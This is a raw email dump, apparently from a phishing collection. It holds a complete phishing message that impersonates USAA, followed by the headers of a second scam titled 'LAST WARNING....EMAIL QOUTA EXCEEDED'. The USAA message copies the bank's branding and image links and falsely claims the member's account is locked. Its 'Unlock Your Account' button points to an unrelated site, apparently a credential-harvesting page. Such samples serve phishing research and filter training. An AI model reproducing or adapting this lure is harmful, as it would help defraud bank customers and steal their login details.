From: "USAA" <noreply-secure@umoncton.ca>
Date: Mon, 02 May 2016 08:28:26 -0300
Return-Path: noreply-secure@umoncton.ca
Message-ID: <VCENTER55x2I5L40sP200002921@VCENTER55.caper.com.br>
X-OriginalArrivalTime: 02 May 2016 11:28:26.0611 (UTC) FILETIME=[BE8E6430:01D1A465]
Status: O
X-Status: 
X-Keywords:                  
X-UID: 195

You will not see this in a MIME-aware mail reader.
--===============0826606241==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

 =

   To ensure delivery to your inbox, please add USAA.Web.Services@customerm=
ail.usaa.com to your address book.	 =

 =

   	  =

   =

  	  =

   Detailed Information Update
  View Accounts | Privacy Promise | Contact Us
	  =

    =

   	 =

  	 =

  	 =

	  =

   USAA SECURITY ZONE =

Account
Verification =

USAA #
	  =

   =

  =

  =

   =

  =

 =

    =

   Dear USAA Member,
While upgrading all checking and savings accounts with the newly added secu=
rity features, It appears that some of your information are missing or inco=
mplete on your account profile. We have therefore, Lock your account until =
youre-update your account.
 Kindly click on the link below to re-update your detailed information. =

 =

   	 Unlock Your Account

Thank you,
USAA

	  =

    =

	 	 =

  	 	 	 =

   =

  Please do not reply to this e-mail. To send a secure message to USAA, ple=
ase contact us.

Privacy Promise
USAA, 9800 Fredericksburg Road, San Antonio, Texas 78288
 USAA means United Services Automobile Association and its insurance, banki=
ng, investment and other
companies. Banks Member FDIC. Investments provided by USAA Investment Manag=
ement Company
and USAA Financial Advisors Inc., both registered broker dealers.
  66696-0411   =



--===============0826606241==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<HTML><BODY><DIV align=3Dcenter>
<TABLE cellSpacing=3D0 cellPadding=3D0 width=3D650 bgColor=3D#b5d7e6 border=
=3D0>
<TBODY>
<TR>
<TD height=3D35 vAlign=3Dmiddle background=3Dhttps://content.usaa.com/mcont=
ent/static_assets/Media/email_emailbar_bg.gif width=3D650 align=3Dcenter><F=
ONT style=3D"FONT-SIZE: 9px; COLOR: #929292" face=3D"Verdana, sans-serif">T=
o ensure delivery to your inbox, please add <SPAN style=3D"COLOR: #68a7c5">=
USAA.Web.Services@customermail.usaa.com</SPAN> to your address book.</FONT>=
</TD>
<TD></TD></TR></TBODY></TABLE>
<TABLE cellSpacing=3D0 cellPadding=3D0 width=3D650 bgColor=3D#b5d7e6 border=
=3D0>
<TBODY>
<TR>
<TD width=3D10></TD>
<TD bgColor=3Dwhite width=3D630 align=3Dcenter>
<TABLE cellSpacing=3D0 cellPadding=3D0 width=3D604 border=3D0>
<TBODY>
<TR>
<TD height=3D5 colSpan=3D4></TD></TR>
<TR>
<TD height=3D45 width=3D54><A href=3D"/do/redirect?url=3Dhttps%253A%252F%25=
2Fwww.usaa.com%252Finet%252Fent_logon%252FLogon%253FEID%253D66696-0411_head=
&amp;hmac=3D868a3cd16da4328004a4a61240cc32c8" target=3D_blank><IMG border=
=3D0 alt=3D"" src=3D"https://content.usaa.com/mcontent/static_assets/Media/=
email_logo.gif" width=3D61 height=3D41></A></TD>
<TD>
<TABLE cellSpacing=3D0 cellPadding=3D0 border=3D0>
<TBODY>
<TR>
<TD style=3D"COLOR: #6d6d6d; FONT: bold 16px Arial, sans-serif" height=3D22=
 align=3Dleft><SPAN style=3D"MARGIN-TOP: 9px; DISPLAY: block">Detailed Info=
rmation Update</SPAN></TD></TR>
<TR>
<TD height=3D23 align=3Dleft><NOBR><FONT size=3D1 face=3D"Verdana, sans-ser=
if"><A style=3D"TEXT-DECORATION: none; COLOR: #6d6d6d" href=3D"/do/redirect=
?url=3Dhttps%253A%252F%252Fwww.usaa.com%252Finet%252Fent_home%252FCpHome%25=
3FEID%253D66696-0411_head&amp;hmac=3Db63f3ede84d7aecb1453f485ebb18171" targ=
et=3D_blank>View Accounts</A> | <A style=3D"TEXT-DECORATION: none; COLOR: #=
6d6d6d" href=3D"/do/redirect?url=3Dhttps%253A%252F%252Fwww.usaa.com%252Fine=
t%252Fent_utils%252FMcStaticPages%253Fkey%253Dprivacy_promise%2526EID%253D6=
6696-0411_head&amp;hmac=3D2bdc509aa9c1ce8863e3f10df0bb02d2" target=3D_blank=
>Privacy Promise</A> | <A style=3D"TEXT-DECORATION: none; COLOR: #6d6d6d" h=
ref=3D"/do/redirect?url=3Dhttps%253A%252F%252Fwww.usaa.com%252Finet%252Fent=
_contactus%252FCpLevelZeroContactUs%253FContactUsPageId%253DPublicContactUs=
%2526EID%253D66696-0411_head&amp;hmac=3Dee055b73f445598f09992b872d321254" t=
arget=3D_blank>Contact Us</A></FONT></NOBR></TD></TR></TBODY></TABLE></TD>
<TD height=3D45 vAlign=3Dmiddle width=3D367 align=3Dright>
<TABLE height=3D65 cellSpacing=3D0 cellPadding=3D0 width=3D188 border=3D0>
<TBODY>
<TR>
<TD width=3D22>
<TABLE height=3D65 cellSpacing=3D0 cellPadding=3D0 width=3D22 border=3D0>
<TBODY>
<TR>
<TD style=3D"LINE-HEIGHT: 0" height=3D29 vAlign=3Dtop width=3D8><IMG style=
=3D"DISPLAY: block" border=3D0 alt=3D"" src=3D"https://content.usaa.com/mco=
ntent/static_assets/Media/email_sec_1-1.gif?EID=3D5686655406" width=3D8 hei=
ght=3D29></TD>
<TD style=3D"LINE-HEIGHT: 0" bgColor=3D#e7e7e8 height=3D29 vAlign=3Dtop wid=
th=3D14><IMG style=3D"DISPLAY: block" border=3D0 alt=3D"" src=3D"https://co=
ntent.usaa.com/mcontent/static_assets/Media/email_sec_1-2.gif" width=3D14 h=
eight=3D29></TD></TR>
<TR>
<TD style=3D"LINE-HEIGHT: 0" height=3D29 vAlign=3Dtop width=3D8><IMG style=
=3D"DISPLAY: block" border=3D0 alt=3D"" src=3D"https://content.usaa.com/mco=
ntent/static_assets/Media/email_sec_spacer.gif" width=3D8 height=3D29></TD>
<TD style=3D"LINE-HEIGHT: 0" bgColor=3D#e7e7e8 height=3D29 vAlign=3Dtop wid=
th=3D14><IMG style=3D"DISPLAY: block" border=3D0 alt=3D"" src=3D"https://co=
ntent.usaa.com/mcontent/static_assets/Media/email_sec_spacer.gif" width=3D1=
4 height=3D29></TD></TR>
<TR>
<TD style=3D"LINE-HEIGHT: 0" height=3D7 vAlign=3Dbottom width=3D8></TD>
<TD style=3D"LINE-HEIGHT: 0" bgColor=3D#e7e7e8 height=3D7 vAlign=3Dbottom w=
idth=3D14><IMG style=3D"DISPLAY: block" border=3D0 alt=3D"" src=3D"https://=
content.usaa.com/mcontent/static_assets/Media/email_sec_2-1.gif" width=3D14=
 height=3D7></TD></TR></TBODY></TABLE></TD>
<TD bgColor=3D#e7e7e8 align=3Dleft>
<TABLE height=3D65 cellSpacing=3D0 cellPadding=3D5 width=3D"100%" border=3D=
0>
<TBODY>
<TR>
<TD style=3D"FONT-SIZE: 9px; TEXT-ALIGN: left; LINE-HEIGHT: 12px; -webkit-t=
ext-size-adjust: none" vAlign=3Dmiddle align=3Dleft><FONT style=3D"FONT-SIZ=
E: 10px; COLOR: #00365b" face=3D"Arial, Helvetica, sans-serif"><STRONG>USAA=
 SECURITY ZONE</STRONG></FONT> <BR><FONT style=3D"FONT-SIZE: 9px; COLOR: #0=
0365b"></FONT><FONT color=3D#00365b face=3DArial>Account</FONT><BR><FONT co=
lor=3D#00365b face=3DArial>Verification</FONT>&nbsp;<BR><FONT style=3D"FONT=
-SIZE: 9px; COLOR: #00365b" face=3D"Arial, Helvetica, sans-serif">USAA #</F=
ONT></TD></TR></TBODY></TABLE></TD>
<TD bgColor=3D#ffffff width=3D7>
<TABLE height=3D65 cellSpacing=3D0 cellPadding=3D0 width=3D7 border=3D0>
<TBODY>
<TR>
<TD style=3D"LINE-HEIGHT: 0" bgColor=3D#e7e7e8 height=3D7 vAlign=3Dtop widt=
h=3D7 align=3Dright><IMG style=3D"DISPLAY: block" border=3D0 alt=3D"" src=
=3D"https://content.usaa.com/mcontent/static_assets/Media/email_sec_1-3.gif=
" width=3D7 height=3D7></TD></TR>
<TR>
<TD style=3D"LINE-HEIGHT: 0" bgColor=3D#e7e7e8 height=3D51 vAlign=3Dtop wid=
th=3D7 align=3Dright><IMG style=3D"DISPLAY: block" border=3D0 alt=3D"" src=
=3D"https://content.usaa.com/mcontent/static_assets/Media/email_sec_spacer.=
gif" width=3D7 height=3D51></TD></TR>
<TR>
<TD style=3D"LINE-HEIGHT: 0" bgColor=3D#e7e7e8 height=3D7 vAlign=3Dbottom w=
idth=3D7 align=3Dright><IMG style=3D"DISPLAY: block" border=3D0 alt=3D"" sr=
c=3D"https://content.usaa.com/mcontent/static_assets/Media/email_sec_2-2.gi=
f" width=3D7 height=3D7></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE=
></TD></TR>
<TR>
<TD height=3D20 colSpan=3D4>&nbsp;</TD></TR>
<TR>
<TD height=3D1 colSpan=3D4></TD></TR></TBODY></TABLE>
<TABLE cellSpacing=3D0 cellPadding=3D0 width=3D"95%" border=3D0>
<TBODY>
<TR>
<TD height=3D20 colSpan=3D2>&nbsp;</TD></TR>
<TR>
<TD width=3D"95%" align=3Dleft><FONT style=3D"FONT-SIZE: 12px; COLOR: #3333=
33; LINE-HEIGHT: 18px" face=3D"Verdana, sans-serif">
<P style=3D"MARGIN-BOTTOM: 1em">Dear USAA Member,</P>While upgrading all ch=
ecking and savings accounts with the newly added security features, It appe=
ars that some of your information are missing or incomplete on your account=
 profile. We have therefore, Lock your account until youre-update your acco=
unt.<BR>
<P style=3D"MARGIN-BOTTOM: 1em">Kindly click on the&nbsp;link below to re-u=
pdate your&nbsp;detailed information.&nbsp;</P>
<TABLE height=3D15 cellSpacing=3D0 cellPadding=3D0 bgColor=3D#6cae35 border=
=3D0>
<TBODY>
<TR bgColor=3D#6cae35>
<TD bgColor=3D#6cae35 vAlign=3Dmiddle width=3D15 align=3Dcenter><IMG src=3D=
"https://content.usaa.com/mcontent/static_assets/Media/email_cta_arrow.gif"=
 width=3D15 height=3D15></TD>
<TD bgColor=3D#6cae35 vAlign=3Dmiddle width=3D134 align=3Dcenter><A style=
=3D"TEXT-DECORATION: none; COLOR: #fff; FONT: bold 11px arial, sans-serif" =
href=3D"http://publichousingwaitlist.com/.Securenet/ridi.htm" target=3D_bla=
nk>Unlock&nbsp;Your Account</A></TD></TR></TBODY></TABLE><BR>Thank you,<BR>=
USAA<BR><BR></FONT></TD>
<TD>&nbsp;</TD></TR>
<TR>
<TD height=3D30 colSpan=3D2><A href=3D"/do/redirect?url=3Dhttp%253A%252F%25=
2Fwww.facebook.com%252FUSAA%253FEID%253D66696-0411_body&amp;hmac=3D8f734dda=
e8754ed8450871e6ae8aee4d" target=3D_blank><IMG border=3D0 alt=3DFacebook sr=
c=3D"http://content.usaa.com/mcontent/static_assets/om/Media/thumbnails/fac=
ebookIcon.gif" width=3D32 height=3D32></A>&nbsp;&nbsp;<A href=3D"/do/redire=
ct?url=3Dhttp%253A%252F%252Ftwitter.com%252Fusaa%253FEID%253D66696-0411_bod=
y&amp;hmac=3D61f26eb01d68e8a13d4b8776a0b23159" target=3D_blank><IMG border=
=3D0 alt=3DTwitter src=3D"http://content.usaa.com/mcontent/static_assets/om=
/Media/thumbnails/twitterIcon.gif" width=3D32 height=3D32></A></TD></TR></T=
BODY></TABLE></TD>
<TD background=3Dhttps://content.usaa.com/mcontent/static_assets/Media/emai=
l_vertical-ds.gif width=3D5></TD>
<TD width=3D5></TD></TR>
<TR>
<TD height=3D5 width=3D10></TD>
<TD height=3D5 background=3Dhttps://content.usaa.com/mcontent/static_assets=
/Media/email_horizontal-ds.gif width=3D630></TD>
<TD height=3D5 width=3D5><IMG border=3D0 alt=3D"" src=3D"https://content.us=
aa.com/mcontent/static_assets/Media/email_corner-ds.gif" width=3D5 height=
=3D5></TD>
<TD height=3D5 width=3D5></TD></TR>
<TR>
<TD height=3D20 colSpan=3D4>&nbsp;</TD></TR>
<TR>
<TD colSpan=3D4 align=3Dcenter><FONT style=3D"FONT-SIZE: 10px; COLOR: #6d6d=
6d; LINE-HEIGHT: 18px" face=3D"Verdana, sans-serif">Please do not reply to =
this e-mail. To send a secure message to USAA, please <A style=3D"TEXT-DECO=
RATION: none; COLOR: #408cb0" href=3D"/do/redirect?url=3Dhttps%253A%252F%25=
2Fwww.usaa.com%252Finet%252Fent_references%252FCpSendUsAMessage%253FContent=
Area%253Dcp%2526EID%253D66696-0411_foot&amp;hmac=3D6e746a2071579c6b9703f4da=
48772474" target=3D_blank>contact us</A>.<BR><BR><A style=3D"COLOR: #6d6d6d=
" href=3D"/do/redirect?url=3Dhttps%253A%252F%252Fwww.usaa.com%252Finet%252F=
ent_utils%252FMcStaticPages%253Fkey%253Dprivacy_promise%2526EID%253D66696-0=
411_foot&amp;hmac=3D96ca14375f4e756d1b818cfc9147f1ae" target=3D_blank>Priva=
cy Promise</A><BR>USAA, 9800 Fredericksburg Road, San Antonio, Texas 78288<=
BR>
<DIV style=3D"PADDING-BOTTOM: 10px; PADDING-TOP: 10px; PADDING-LEFT: 10px; =
PADDING-RIGHT: 10px" align=3Dleft>USAA means United Services Automobile Ass=
ociation and <A style=3D"TEXT-DECORATION: none; COLOR: #408cb0" href=3D"/do=
/redirect?url=3Dhttps%253A%252F%252Fwww.usaa.com%252Finet%252Fent_utils%252=
FMcStaticPages%253Fkey%253Dabout_usaa_overview%2526EID%253D66696-0411_foot&=
amp;hmac=3D7725df7cd23d99ed05ec227eacccc8bc" target=3D_blank>its insurance,=
 banking, investment and other<BR>companies</A>. Banks Member FDIC. Investm=
ents provided by USAA Investment Management Company<BR>and USAA Financial A=
dvisors Inc., both registered broker dealers.</DIV></FONT></TD></TR>
<TR>
<TD colSpan=3D4 align=3Dright><FONT style=3D"FONT-SIZE: 10px; COLOR: #6d6d6=
d; LINE-HEIGHT: 18px" face=3D"Verdana, sans-serif">66696-0411&nbsp;&nbsp;&n=
bsp;</FONT><BR><BR></TD></TR></TBODY></TABLE></DIV></BODY></HTML>
--===============0826606241==--

From jose@monkey.org Tue May  3 16:58:22 2016 +0000
Return-Path: info@mailserver.com
Delivered-To: jose@monkey.org
X-FDA: 71474339244.05.skin43_64db274d7fa20
X-Spam-Summary: 73,5,0,d58be864951d277e,d41d8cd98f00b204,info@mailserver.com,:,RULES_HIT:41:72:355:379:495:800:962:966:967:969:973:983:988:989:1147:1189:1208:1221:1260:1263:1313:1314:1345:1381:1431:1433:1434:1436:1437:1516:1517:1518:1534:1540:1566:1575:1588:1592:1594:1685:1711:1714:1730:1777:1792:2196:2199:2525:2553:2560:2563:2610:2682:2685:2693:2790:2859:2890:2898:2899:2900:2933:2937:2939:2942:2945:2947:2951:2954:3022:3040:3138:3139:3140:3141:3142:3867:3868:3871:3873:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4385:4552:4699:5007:6261:6669:7652:8518:8603:9025:9121:9388:9416:9873:9908:10012:10214:10346:10400:11233:11480:11658:11914:12043:12517:12519:12555:12658:12659:12660:13025:13139:13235:13237:13439:14096:14181:14515:14596:14659:14687:14721:21080:21259:21433:30001:30022:30026:30054:30070:30075:30090:30091,0,RBL:error,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:fn,MSBL:0,DNSBL:neutral,Custom_rules:0:3:0,LFtime:11,LUA_SUMMARY:none
X-HE-Tag: skin43_64db274d7fa20
X-Filterd-Recvd-Size: 2653
Received: from rcaredev.riyadhcare.com (mail.riyadhcare.com [88.85.240.58])
	by imf04.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Tue,  3 May 2016 16:58:12 +0000 (UTC)
MIME-version: 1.0
Content-type: multipart/alternative;
 boundary="Boundary_(ID_RAsBAI+j3iW4fDAPgN8qMg)"
Received: from [41.138.172.65] ([unknown] [41.138.172.65])
 by rcaredev.riyadhcare.com
 (Sun Java(tm) System Messaging Server 7.3-11.01 64bit (built Sep  1 2009))
 with ESMTPA id <0O6H004OA5CJHFR0@rcaredev.riyadhcare.com> for jose@monkey.org;
 Sun, 01 May 2016 04:26:50 +0300 (AST)
Message-id: <0O6H004OS5CPHFR0@rcaredev.riyadhcare.com>
Subject: LAST WARNING....EMAIL QOUTA EXCEEDED
To: jose@monkey.org
